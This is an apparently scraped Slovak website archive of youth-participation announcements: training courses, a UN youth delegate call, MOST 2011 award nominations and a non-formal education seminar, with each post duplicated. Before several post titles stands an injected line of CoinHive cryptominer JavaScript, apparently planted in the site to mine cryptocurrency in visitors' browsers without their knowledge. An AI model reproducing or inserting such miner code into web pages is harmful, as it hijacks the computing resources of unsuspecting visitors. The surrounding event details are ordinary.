Category Archives: Mládežnícka politika a participácia

Home / Archive by category "Mládežnícka politika a participácia"

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Školenie: Pozor mládež!

Miesto konania: Trnavský kraj- presné miesto konania bude upresnené vybraným účastníkom

Termín:11. 5. – 13. 5. 2012

Uzávierka prihlášok: 1.5.2012

Typ aktivity: školenie

Krátka charakteristika:

Vytvor projekt, ktorý pomôže zlepšiť mládežnícku participáciu na miestnej úrovni!

Ciele aktivity:

Toto školenie poskytuje možnosť spoznať lepšie ako funguje mládežnícka participácia v praxi a ponúka možnosť pochopiť lepšie akciu 1.3 Projekty mládežníckej demokracie v rámci programu Mládež v akcii.

Špecifické ciele:

1. Pochopenie pojmu participácia

2. Predstavenie v skratke programu Mládež v akcii so zameraním na špecifiká akcie 1.3 Projekty Mládežníckej demokracie

3. Tvorba programu projektu mládežníckej demokracie

4. Predstavenie Eurodesku

5. tipy na nadviazanie medzinárodnej spolupráce pri nadnárodných projektoch

Cieľová skupina:

Zástupcovia samospráv, študentské parlamenty, zástupcovia ŽŠR, neformálne skupiny, občianske združenia, neziskové organizácie, ktoré majú potenciál nadviazať aktívny dialóg so samosprávami

Počet účastníkov: 15 účastníkov

Náklady spojené s účasťou na školení:

Ubytovanie a strava sú hradené z prostriedkov programu EÚ Mládež v akcii. Účastník si hradí z vlastných nákladov cestovné náklady z/na miesto konania aktivity.

Kontaktná osoba: Kristína Vachanová

Mesto Leopoldov, Hlohovecká cesta 104/2, SK-920 41 Leopoldov

tel: (421-33) 734 22 07

m.t.: (421-903) 77 27 25

e-mail kristina.vachanova@iuventa.sk

 

V prípade záujmu sa môžete prihlásiť on-line. Prihlášku nájdete tu:

http://www.iuventa.sk/sk/Aktualne-skolenia/Pozor-mladez-.alej?eventid=231

Školenie: Pozor mládež!

Miesto konania: Trnavský kraj- presné miesto konania bude upresnené vybraným účastníkom

Termín:11. 5. – 13. 5. 2012

Uzávierka prihlášok: 1.5.2012

Typ aktivity: školenie

Krátka charakteristika:

Vytvor projekt, ktorý pomôže zlepšiť mládežnícku participáciu na miestnej úrovni!

Ciele aktivity:

Toto školenie poskytuje možnosť spoznať lepšie ako funguje mládežnícka participácia v praxi a ponúka možnosť pochopiť lepšie akciu 1.3 Projekty mládežníckej demokracie v rámci programu Mládež v akcii.

Špecifické ciele:

1. Pochopenie pojmu participácia

2. Predstavenie v skratke programu Mládež v akcii so zameraním na špecifiká akcie 1.3 Projekty Mládežníckej demokracie

3. Tvorba programu projektu mládežníckej demokracie

4. Predstavenie Eurodesku

5. tipy na nadviazanie medzinárodnej spolupráce pri nadnárodných projektoch

Cieľová skupina:

Zástupcovia samospráv, študentské parlamenty, zástupcovia ŽŠR, neformálne skupiny, občianske združenia, neziskové organizácie, ktoré majú potenciál nadviazať aktívny dialóg so samosprávami

Počet účastníkov: 15 účastníkov

Náklady spojené s účasťou na školení:

Ubytovanie a strava sú hradené z prostriedkov programu EÚ Mládež v akcii. Účastník si hradí z vlastných nákladov cestovné náklady z/na miesto konania aktivity.

Kontaktná osoba: Kristína Vachanová

Mesto Leopoldov, Hlohovecká cesta 104/2, SK-920 41 Leopoldov

tel: (421-33) 734 22 07

m.t.: (421-903) 77 27 25

e-mail kristina.vachanova@iuventa.sk

 

V prípade záujmu sa môžete prihlásiť on-line. Prihlášku nájdete tu:

http://www.iuventa.sk/sk/Aktualne-skolenia/Pozor-mladez-.alej?eventid=231

Odleťte s Radou mládeže do OSN v New Yorku!

V projekte Mladí OSN ide približne o to, že jeden mladý človek vo veku od 18 do 24 rokov na jeseň odletí na dva týždne do OSN v New Yorku, kde prednesie svoj vlastný prejav v pléne Valného zhromaždenia a bude lobovať za väčšie zapojenie mladých ľudí do tvorby politík v OSN. (kompletné info nájdete na stránkehttp://www.mladez.sk/mladiosn)

Zaujalo vás to, alebo poznáte niekoho, koho by to zaujímať mohlo? Pošlite mu/jej tento e-mail, alebo zverejnite správu o projekte na vašom webe. Uzávierka prihlasovania je 31. 3. a úspešnému kandidátovi z účasti na projekte nevznikajú žiadne náklady.

Nižšie nájdete aj tlačovú správu so stručnou informáciou o projekte a o tom, ako sa dá prihlásiť.

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Odleťte s Radou mládeže do OSN v New Yorku!

V projekte Mladí OSN ide približne o to, že jeden mladý človek vo veku od 18 do 24 rokov na jeseň odletí na dva týždne do OSN v New Yorku, kde prednesie svoj vlastný prejav v pléne Valného zhromaždenia a bude lobovať za väčšie zapojenie mladých ľudí do tvorby politík v OSN. (kompletné info nájdete na stránkehttp://www.mladez.sk/mladiosn)

Zaujalo vás to, alebo poznáte niekoho, koho by to zaujímať mohlo? Pošlite mu/jej tento e-mail, alebo zverejnite správu o projekte na vašom webe. Uzávierka prihlasovania je 31. 3. a úspešnému kandidátovi z účasti na projekte nevznikajú žiadne náklady.

Nižšie nájdete aj tlačovú správu so stručnou informáciou o projekte a o tom, ako sa dá prihlásiť.

RmS otvára nominácie pre MOST 2011

Milí naši členovia, kamaráti, spúšťame výzvu na nominácie MOST 2011! Aj tento rok by sme radi upriamili pozornosť nás a ostatných na krásne veci, myšlienky a realizácie, ktoré spoločne robíme pre deti a mladých ľudí.

Tento ročník priniesol drobné zmeny: vynovili sme web, zlúčili dve kategórie (z Prínosu podnikateľského subjektu a samosprávy sa stalo Partnerstvo roka), zjednodušili sme nominačný hárok a zavesili ho na web.

Viac informácií nájdete tu: http://mladez.sk/most/ Alebo sa nám ozvite mailom na most(a)mladez.sk 

Dajte nám do 18. apríla vedieť o ľuďoch, spoluprácach a projektoch, ktoré vás v roku 2011 najviac oslovili.

 

Budeme sa tešiť na vaše návrhy!

Srdečne Katarína Mrázková

project manager pre MOST 2011

Rada mládeže Slovenska / Youth Council of Slovakia
Pražská 11, 811 04 Bratislava
Tel.: +4212 547 913 90
Fax: +4212 547 913 89

katarina.mrazkova@mladez.sk
www.mladez.sk
www.facebook.com/mladez.sk

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); RmS otvára nominácie pre MOST 2011

Milí naši členovia, kamaráti, spúšťame výzvu na nominácie MOST 2011! Aj tento rok by sme radi upriamili pozornosť nás a ostatných na krásne veci, myšlienky a realizácie, ktoré spoločne robíme pre deti a mladých ľudí.

Tento ročník priniesol drobné zmeny: vynovili sme web, zlúčili dve kategórie (z Prínosu podnikateľského subjektu a samosprávy sa stalo Partnerstvo roka), zjednodušili sme nominačný hárok a zavesili ho na web.

Viac informácií nájdete tu: http://mladez.sk/most/ Alebo sa nám ozvite mailom na most(a)mladez.sk 

Dajte nám do 18. apríla vedieť o ľuďoch, spoluprácach a projektoch, ktoré vás v roku 2011 najviac oslovili.

 

Budeme sa tešiť na vaše návrhy!

Srdečne Katarína Mrázková

project manager pre MOST 2011

Rada mládeže Slovenska / Youth Council of Slovakia
Pražská 11, 811 04 Bratislava
Tel.: +4212 547 913 90
Fax: +4212 547 913 89

katarina.mrazkova@mladez.sk
www.mladez.sk
www.facebook.com/mladez.sk

Pozvánka: NEFORMÁLNE VZDELÁVANIE V PRÁCI S MLÁDEŽOU

Seminár projektu Gruntvig – SOCOP2: NEFORMÁLNE VZDELÁVANIE V PRÁCI S MLÁDEŽOU: Fáma alebo bežná prax?
Bratislava, 13. – 15. apríl 2012

IUVENTA – Slovenský inštitút mládeže je partnerom na dlhodobom medzinárodnom projekte podporenom programom Grundtvig, ktorý sa venuje otázkam kvality neformálneho vzdelávania v práci s mládežou a kompetenciám dobrovoľných pracovníkov s mládežou.

Pri príležitosti finalizácie a prezentácie textu spoločného vyhlásenia – jeden z výstupov projektu, ktorý práve popisuje zistenia ohľadom vyššie spomínaných tém z rôznych krajín, sa bude v Bratislave konať medzinárodný seminár. A my sme sa túto príležitosť rozhodli plne využiť v súlade so slovenskou realitou…

Komu je tento seminár určený? – profil účastníka
• Dobrovoľným i profesionálnym pracovníkom s mládežou, ktorí majú v organizáciách dosah/vplyv na kvalitu neformálneho vzdelávania (členovia predsedníctva, školitelia,vedúci oddielov, členovia kancelárie…)
• Znalosť anglického jazyka výhodou (nie je nutná podmienka, bude zabezpečený simultánny preklad)
• Podmienkou je účasť počas celého trvania seminára

Do spolupráce na tomto seminári sa zapojili i organizácie Rada mládeže Slovenska, eRko, Slovenský skauting, alebo Asociácia centier voľného času, ktorí prisľúbili aj účasť na panelovej diskusii k téme kvality neformálneho vzdelávania v práci s mládežou, z pohľadu ich organizácií. A tento zoznam ešte nemusí byť konečný! Môžete očakávať inšpiráciu a značnú mieru interaktivity.

Kam a dokedy sa prihlásiť?
Prihlásiť sa treba do 28.3.2012 na:

https://docs.google.com/spreadsheet/viewform?formkey=dGQzN3FOYWdtMEtJNDB3T0UweTQ1OWc6MQ
Predpokladáme maximálny počet účastníkov 60 (17 zahraničných a 43 slovenských). Na
základe Vášho prihlásenia dostanete potvrdzujúci e-mail. Ak spĺňate profil účastníka,
rozhodovať bude termín prihlásenia. Takže neváhajte!

V prípade akýchkoľvek otázok, prosím kontaktujte Tomáša Peška na
tomas.pesek@iuventa.sk prípadne na telefónnom čísle 0908 979 939.
S pozdravom,

Mgr. Michaela Šuľáková
Oddelenie vzťahov s verejnosťou
Public Relations Department

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Pozvánka: NEFORMÁLNE VZDELÁVANIE V PRÁCI S MLÁDEŽOU

Seminár projektu Gruntvig – SOCOP2: NEFORMÁLNE VZDELÁVANIE V PRÁCI S MLÁDEŽOU: Fáma alebo bežná prax?
Bratislava, 13. – 15. apríl 2012

IUVENTA – Slovenský inštitút mládeže je partnerom na dlhodobom medzinárodnom projekte podporenom programom Grundtvig, ktorý sa venuje otázkam kvality neformálneho vzdelávania v práci s mládežou a kompetenciám dobrovoľných pracovníkov s mládežou.

Pri príležitosti finalizácie a prezentácie textu spoločného vyhlásenia – jeden z výstupov projektu, ktorý práve popisuje zistenia ohľadom vyššie spomínaných tém z rôznych krajín, sa bude v Bratislave konať medzinárodný seminár. A my sme sa túto príležitosť rozhodli plne využiť v súlade so slovenskou realitou…

Komu je tento seminár určený? – profil účastníka
• Dobrovoľným i profesionálnym pracovníkom s mládežou, ktorí majú v organizáciách dosah/vplyv na kvalitu neformálneho vzdelávania (členovia predsedníctva, školitelia,vedúci oddielov, členovia kancelárie…)
• Znalosť anglického jazyka výhodou (nie je nutná podmienka, bude zabezpečený simultánny preklad)
• Podmienkou je účasť počas celého trvania seminára

Do spolupráce na tomto seminári sa zapojili i organizácie Rada mládeže Slovenska, eRko, Slovenský skauting, alebo Asociácia centier voľného času, ktorí prisľúbili aj účasť na panelovej diskusii k téme kvality neformálneho vzdelávania v práci s mládežou, z pohľadu ich organizácií. A tento zoznam ešte nemusí byť konečný! Môžete očakávať inšpiráciu a značnú mieru interaktivity.

Kam a dokedy sa prihlásiť?
Prihlásiť sa treba do 28.3.2012 na:

https://docs.google.com/spreadsheet/viewform?formkey=dGQzN3FOYWdtMEtJNDB3T0UweTQ1OWc6MQ
Predpokladáme maximálny počet účastníkov 60 (17 zahraničných a 43 slovenských). Na
základe Vášho prihlásenia dostanete potvrdzujúci e-mail. Ak spĺňate profil účastníka,
rozhodovať bude termín prihlásenia. Takže neváhajte!

V prípade akýchkoľvek otázok, prosím kontaktujte Tomáša Peška na
tomas.pesek@iuventa.sk prípadne na telefónnom čísle 0908 979 939.
S pozdravom,

Mgr. Michaela Šuľáková
Oddelenie vzťahov s verejnosťou
Public Relations Department

Pozvánka: Kontaktný seminár „1-point-3, GO!“

Miesto konania: Slovensko

Termín: 27. 3. – 1. 4. 2012

Uzávierka prihlášok: 5.2.2012

Typ aktivity: Kontaktný seminár

Vymieňajte si nápady – Vytvárajte partnerstvá – Pripravte projekt!

Tento medzinárodný kontaktný seminár poskytuje možnosť spoznať lepšie ako funguje mládežnícka participácia v praxi v Európe, ponúka možnosť nájsť si medzinárodných partnerov a spoločne vytvoriť projekt 1.3 Projekty mládežníckej demokracie, ktorý pomôže zlepšiť mládežnícku participáciu na miestnej úrovni!

Akcia 1.3 Projekty mládežníckej demokracie ponúkajú jedinečnú možnosť mať úžitok z dvojitého partnerstva na národnej i medzinárodnej úrovni. Tak nebuďte sami, získajte podporu a uskutočnite to vďaka programu Mládež v akcii!

Ciele aktivity:

• Vytvoriť medzinárodné partnerstvo a vytvoriť projekt Mládežníckej demokracie

• Zvýšiť poznatky o projektoch 1.3 Projekty mládežníckej demokracie

• Vymieňať si skúsenosti o participácii v praxi

• Spoznať miestnu realitu mládežníckej politiky a príklad projektu 1.3

• Posilniť partnerstvo na národnej úrovni

• Nájsť medzinárodného partnera

• Vytvoriť projekt 1.3 Projekty mládežníckej demokracie

Pracovný jazyk: Anglický jazyk

Cieľová skupina:

• Národné partnerstvo – účastníci reprezentujúci rôzne organizácie/inštitúcie z rovnakej krajiny (napr. neformálna skupina, nezisková organizácia, mimovládna organizácia, miestna/regionálna samospráva, mládežnícky/miestny parlament…)

• Národné partnerstvo pozostáva z dvojice 1 +1 (každý reprezentuje inú organizáciu/inštitúciu)

• Sú pripravení spolupracovať na budúcom projekte 1.3 Projekty mládežníckej demokracie

• Obaja partneri majú základnú informáciu o programe Mládež v akcii, o jeho filozofii a štruktúre (odporúča sa na prípravu kontaktovať Národnú agentúru)

• Sú schopní komunikovať v anglickom jazyku

Chcú pripraviť projekt 1.3 Projekty mládežníckej demokracie

Počet účastníkov:

15-40 účastníkov (vo dvojiciach) z programových krajín programu Mládež v akcii

Náklady spojené s účasťou na školení:

Strava, ubytovanie a iné náklady súvisiace so seminárom sú hradené z programu EÚ Mládež v akcii. Jediným vkladom slovenských účastníkov je zabezpečiť si cestovné náklady na/z miesto konania kontaktného seminára z vlastných zdrojov.

Prihláška :

http://www.salto-youth.net/tools/european-training-calendar/training/1-point-3-go.2394/

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Pozvánka: Kontaktný seminár „1-point-3, GO!“

Miesto konania: Slovensko

Termín: 27. 3. – 1. 4. 2012

Uzávierka prihlášok: 5.2.2012

Typ aktivity: Kontaktný seminár

Vymieňajte si nápady – Vytvárajte partnerstvá – Pripravte projekt!

Tento medzinárodný kontaktný seminár poskytuje možnosť spoznať lepšie ako funguje mládežnícka participácia v praxi v Európe, ponúka možnosť nájsť si medzinárodných partnerov a spoločne vytvoriť projekt 1.3 Projekty mládežníckej demokracie, ktorý pomôže zlepšiť mládežnícku participáciu na miestnej úrovni!

Akcia 1.3 Projekty mládežníckej demokracie ponúkajú jedinečnú možnosť mať úžitok z dvojitého partnerstva na národnej i medzinárodnej úrovni. Tak nebuďte sami, získajte podporu a uskutočnite to vďaka programu Mládež v akcii!

Ciele aktivity:

• Vytvoriť medzinárodné partnerstvo a vytvoriť projekt Mládežníckej demokracie

• Zvýšiť poznatky o projektoch 1.3 Projekty mládežníckej demokracie

• Vymieňať si skúsenosti o participácii v praxi

• Spoznať miestnu realitu mládežníckej politiky a príklad projektu 1.3

• Posilniť partnerstvo na národnej úrovni

• Nájsť medzinárodného partnera

• Vytvoriť projekt 1.3 Projekty mládežníckej demokracie

Pracovný jazyk: Anglický jazyk

Cieľová skupina:

• Národné partnerstvo – účastníci reprezentujúci rôzne organizácie/inštitúcie z rovnakej krajiny (napr. neformálna skupina, nezisková organizácia, mimovládna organizácia, miestna/regionálna samospráva, mládežnícky/miestny parlament…)

• Národné partnerstvo pozostáva z dvojice 1 +1 (každý reprezentuje inú organizáciu/inštitúciu)

• Sú pripravení spolupracovať na budúcom projekte 1.3 Projekty mládežníckej demokracie

• Obaja partneri majú základnú informáciu o programe Mládež v akcii, o jeho filozofii a štruktúre (odporúča sa na prípravu kontaktovať Národnú agentúru)

• Sú schopní komunikovať v anglickom jazyku

Chcú pripraviť projekt 1.3 Projekty mládežníckej demokracie

Počet účastníkov:

15-40 účastníkov (vo dvojiciach) z programových krajín programu Mládež v akcii

Náklady spojené s účasťou na školení:

Strava, ubytovanie a iné náklady súvisiace so seminárom sú hradené z programu EÚ Mládež v akcii. Jediným vkladom slovenských účastníkov je zabezpečiť si cestovné náklady na/z miesto konania kontaktného seminára z vlastných zdrojov.

Prihláška :

http://www.salto-youth.net/tools/european-training-calendar/training/1-point-3-go.2394/